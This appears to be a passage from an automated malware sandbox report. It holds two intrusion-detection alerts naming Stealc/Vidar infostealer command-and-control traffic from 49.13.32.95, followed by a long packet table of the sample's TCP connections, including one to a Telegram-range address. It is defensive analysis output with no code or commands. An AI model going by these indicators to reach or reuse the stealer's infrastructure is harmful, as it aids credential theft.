2024-11-25T11:33:30.384328+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	49.13.32.95	443	192.168.2.5	49740	TCP
2024-11-25T11:33:32.752858+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	49.13.32.95	443	192.168.2.5	49746	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 11:32:52.350677013 CET	49675	443	192.168.2.5	23.1.237.91
Nov 25, 2024 11:32:52.350691080 CET	49674	443	192.168.2.5	23.1.237.91
Nov 25, 2024 11:32:52.460031986 CET	49673	443	192.168.2.5	23.1.237.91
Nov 25, 2024 11:33:01.959956884 CET	49675	443	192.168.2.5	23.1.237.91
Nov 25, 2024 11:33:01.959986925 CET	49674	443	192.168.2.5	23.1.237.91
Nov 25, 2024 11:33:02.069334030 CET	49673	443	192.168.2.5	23.1.237.91
Nov 25, 2024 11:33:04.454967976 CET	443	49703	23.1.237.91	192.168.2.5
Nov 25, 2024 11:33:04.455081940 CET	49703	443	192.168.2.5	23.1.237.91
Nov 25, 2024 11:33:13.321568966 CET	49704	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:13.321602106 CET	443	49704	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:13.321676016 CET	49704	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:13.323703051 CET	49704	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:13.323718071 CET	443	49704	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:14.591363907 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:14.591403961 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:14.591521025 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:14.591929913 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:14.591942072 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:15.078149080 CET	443	49704	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:15.078222036 CET	49704	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:15.080940008 CET	49704	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:15.080950975 CET	443	49704	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:15.081191063 CET	443	49704	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:15.131817102 CET	49704	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:16.377329111 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:16.377466917 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:16.381933928 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:16.381942987 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:16.382198095 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:16.391953945 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:16.439332962 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:16.577567101 CET	49704	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:16.623332977 CET	443	49704	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:16.864612103 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:16.864640951 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:16.864655018 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:16.864799023 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:16.864820004 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:16.864870071 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.054296017 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.054317951 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.054361105 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.054377079 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.054398060 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.054419041 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.098759890 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.098778009 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.098834991 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.098845959 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.098979950 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.158499002 CET	443	49704	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:17.158543110 CET	443	49704	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:17.158550978 CET	443	49704	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:17.158562899 CET	443	49704	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:17.158582926 CET	443	49704	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:17.158667088 CET	49704	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:17.158667088 CET	49704	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:17.158689976 CET	443	49704	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:17.158740044 CET	49704	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:17.178991079 CET	443	49704	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:17.179075003 CET	49704	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:17.179076910 CET	443	49704	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:17.179125071 CET	49704	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:17.230839014 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.230860949 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.230925083 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.230951071 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.231061935 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.263048887 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.263072968 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.263103008 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.263113022 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.263154984 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.283405066 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.283421040 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.283463001 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.283469915 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.283510923 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.303275108 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.303289890 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.303363085 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.303370953 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.303419113 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.425590992 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.425610065 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.425688028 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.425698996 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.425740957 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.441199064 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.441214085 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.441327095 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.441333055 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.441843987 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.454564095 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.454580069 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.454617023 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.454626083 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.454638958 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.454667091 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.469976902 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.469993114 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.470062017 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.470072985 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.470335960 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.485275030 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.485289097 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.485338926 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.485352039 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.485397100 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.485397100 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.487514973 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.487570047 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.487617016 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.488313913 CET	49706	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.488333941 CET	443	49706	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.540757895 CET	49710	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.540815115 CET	443	49710	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.540987968 CET	49710	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.542593956 CET	49711	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.542680025 CET	443	49711	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.542872906 CET	49711	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.543415070 CET	49712	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.543471098 CET	443	49712	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.543555021 CET	49712	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.545015097 CET	49713	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.545061111 CET	443	49713	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.545300961 CET	49713	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.545438051 CET	49710	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.545450926 CET	443	49710	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.545537949 CET	49713	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.545552015 CET	443	49713	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.545671940 CET	49711	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.545706987 CET	443	49711	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.545903921 CET	49712	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.545938015 CET	443	49712	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.547394037 CET	49714	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.547431946 CET	443	49714	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:17.547668934 CET	49714	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.549526930 CET	49714	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:17.549554110 CET	443	49714	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:18.377975941 CET	49715	443	192.168.2.5	149.154.167.99
Nov 25, 2024 11:33:18.378015041 CET	443	49715	149.154.167.99	192.168.2.5
Nov 25, 2024 11:33:18.378115892 CET	49715	443	192.168.2.5	149.154.167.99
Nov 25, 2024 11:33:18.389619112 CET	49715	443	192.168.2.5	149.154.167.99
Nov 25, 2024 11:33:18.389631987 CET	443	49715	149.154.167.99	192.168.2.5
Nov 25, 2024 11:33:18.519501925 CET	49704	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:18.519517899 CET	443	49704	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:18.519530058 CET	49704	443	192.168.2.5	20.109.210.53
Nov 25, 2024 11:33:18.519535065 CET	443	49704	20.109.210.53	192.168.2.5
Nov 25, 2024 11:33:19.260948896 CET	443	49713	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.260962963 CET	443	49711	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.280328035 CET	49713	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.280340910 CET	443	49713	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.282644033 CET	49711	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.282697916 CET	49713	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.282702923 CET	443	49713	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.282710075 CET	443	49711	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.283062935 CET	49711	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.283082962 CET	443	49711	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.325779915 CET	443	49712	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.328862906 CET	49712	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.328933954 CET	443	49712	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.329714060 CET	49712	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.329734087 CET	443	49712	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.393800020 CET	443	49714	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.395649910 CET	443	49710	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.400943995 CET	49714	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.400979996 CET	443	49714	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.401771069 CET	49714	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.401782990 CET	443	49714	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.402355909 CET	49710	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.402369976 CET	443	49710	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.402889013 CET	49710	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.402894974 CET	443	49710	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.694869995 CET	443	49711	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.694932938 CET	443	49711	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.695038080 CET	49711	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.700037003 CET	443	49713	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.700059891 CET	443	49713	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.700119019 CET	443	49713	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.700145960 CET	49713	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.700189114 CET	49713	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.701050997 CET	49711	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.701097965 CET	443	49711	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.701131105 CET	49711	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.701147079 CET	443	49711	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.705492020 CET	49713	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.705512047 CET	443	49713	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.705523014 CET	49713	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.705528975 CET	443	49713	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.743830919 CET	49717	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.743864059 CET	443	49717	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.744003057 CET	49717	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.746326923 CET	49718	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.746381044 CET	443	49718	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.746474981 CET	49718	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.746572018 CET	49717	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.746587992 CET	443	49717	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.746896029 CET	49718	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.746927977 CET	443	49718	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.781121016 CET	443	49712	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.781142950 CET	443	49712	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.781194925 CET	443	49712	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.781229973 CET	49712	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.781271935 CET	49712	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.781578064 CET	49712	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.781578064 CET	49712	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.781614065 CET	443	49712	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.781661034 CET	443	49712	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.783854008 CET	49719	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.783878088 CET	443	49719	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.783943892 CET	49719	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.784152985 CET	49719	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.784164906 CET	443	49719	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.802026987 CET	443	49715	149.154.167.99	192.168.2.5
Nov 25, 2024 11:33:19.802182913 CET	49715	443	192.168.2.5	149.154.167.99
Nov 25, 2024 11:33:19.846800089 CET	443	49714	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.846879959 CET	443	49714	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.847990036 CET	49714	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.853818893 CET	443	49710	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.853842020 CET	443	49710	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.853939056 CET	49710	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.853949070 CET	443	49710	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.854888916 CET	49710	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.860079050 CET	443	49710	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.860122919 CET	443	49710	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.860176086 CET	49710	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.863878965 CET	49714	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.863897085 CET	443	49714	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.886297941 CET	49715	443	192.168.2.5	149.154.167.99
Nov 25, 2024 11:33:19.886312008 CET	443	49715	149.154.167.99	192.168.2.5
Nov 25, 2024 11:33:19.886571884 CET	443	49715	149.154.167.99	192.168.2.5
Nov 25, 2024 11:33:19.886667967 CET	49715	443	192.168.2.5	149.154.167.99
Nov 25, 2024 11:33:19.890971899 CET	49715	443	192.168.2.5	149.154.167.99
Nov 25, 2024 11:33:19.891500950 CET	49710	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.891500950 CET	49710	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.891515017 CET	443	49710	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.891522884 CET	443	49710	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.899450064 CET	49720	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.899483919 CET	443	49720	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.899626017 CET	49720	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.900820017 CET	49721	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.900859118 CET	443	49721	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.901034117 CET	49721	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.901227951 CET	49720	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.901247978 CET	443	49720	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.901386976 CET	49721	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:19.901398897 CET	443	49721	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:19.931337118 CET	443	49715	149.154.167.99	192.168.2.5
Nov 25, 2024 11:33:20.366611004 CET	443	49715	149.154.167.99	192.168.2.5
Nov 25, 2024 11:33:20.366636992 CET	443	49715	149.154.167.99	192.168.2.5
Nov 25, 2024 11:33:20.366660118 CET	49715	443	192.168.2.5	149.154.167.99
Nov 25, 2024 11:33:20.366667986 CET	443	49715	149.154.167.99	192.168.2.5
Nov 25, 2024 11:33:20.366687059 CET	443	49715	149.154.167.99	192.168.2.5
Nov 25, 2024 11:33:20.366702080 CET	49715	443	192.168.2.5	149.154.167.99
Nov 25, 2024 11:33:20.366739988 CET	443	49715	149.154.167.99	192.168.2.5
Nov 25, 2024 11:33:20.366753101 CET	49715	443	192.168.2.5	149.154.167.99
Nov 25, 2024 11:33:20.366799116 CET	49715	443	192.168.2.5	149.154.167.99
Nov 25, 2024 11:33:20.373378992 CET	49715	443	192.168.2.5	149.154.167.99
Nov 25, 2024 11:33:20.373395920 CET	443	49715	149.154.167.99	192.168.2.5
Nov 25, 2024 11:33:20.624209881 CET	49722	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:20.624233961 CET	443	49722	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:20.624305010 CET	49722	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:20.624533892 CET	49722	443	192.168.2.5	49.13.32.95
Nov 25, 2024 11:33:20.624548912 CET	443	49722	49.13.32.95	192.168.2.5
Nov 25, 2024 11:33:21.465761900 CET	443	49717	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.468496084 CET	49717	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.468511105 CET	443	49717	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.470138073 CET	49717	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.470143080 CET	443	49717	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.508666039 CET	443	49719	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.509037018 CET	49719	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.509044886 CET	443	49719	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.509416103 CET	49719	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.509419918 CET	443	49719	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.527240038 CET	443	49718	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.527550936 CET	49718	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.527595997 CET	443	49718	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.527883053 CET	49718	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.527901888 CET	443	49718	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.680385113 CET	443	49721	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.684226036 CET	49721	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.684252024 CET	443	49721	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.684741974 CET	49721	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.684746981 CET	443	49721	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.747396946 CET	443	49720	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.748338938 CET	49720	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.748358965 CET	443	49720	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.749056101 CET	49720	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.749064922 CET	443	49720	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.904367924 CET	443	49717	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.904436111 CET	443	49717	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.904659986 CET	49717	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.904700041 CET	49717	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.904721975 CET	443	49717	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.904735088 CET	49717	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.904740095 CET	443	49717	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.907448053 CET	49723	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.907491922 CET	443	49723	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.907556057 CET	49723	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.907687902 CET	49723	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.907697916 CET	443	49723	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.946278095 CET	443	49719	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.946340084 CET	443	49719	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.946388960 CET	49719	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.946491003 CET	49719	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.946497917 CET	443	49719	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.946506023 CET	49719	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.946508884 CET	443	49719	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.948661089 CET	49724	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.948685884 CET	443	49724	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.948786020 CET	49724	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.948889971 CET	49724	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.948901892 CET	443	49724	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.975176096 CET	443	49718	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.975248098 CET	443	49718	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.975328922 CET	49718	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.975430965 CET	49718	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.975462914 CET	443	49718	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.975512981 CET	49718	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.975528955 CET	443	49718	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.977580070 CET	49725	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.977636099 CET	443	49725	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:21.977710962 CET	49725	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.977823973 CET	49725	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:21.977861881 CET	443	49725	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:22.124996901 CET	443	49721	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:22.125062943 CET	443	49721	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:22.125113010 CET	49721	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:22.125312090 CET	49721	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:22.125329018 CET	443	49721	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:22.125339031 CET	49721	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:22.125344038 CET	443	49721	13.107.246.63	192.168.2.5
Nov 25, 2024 11:33:22.127784967 CET	49726	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:33:22.127795935 CET	443	49726	13.107.246.63	192.168.2.5
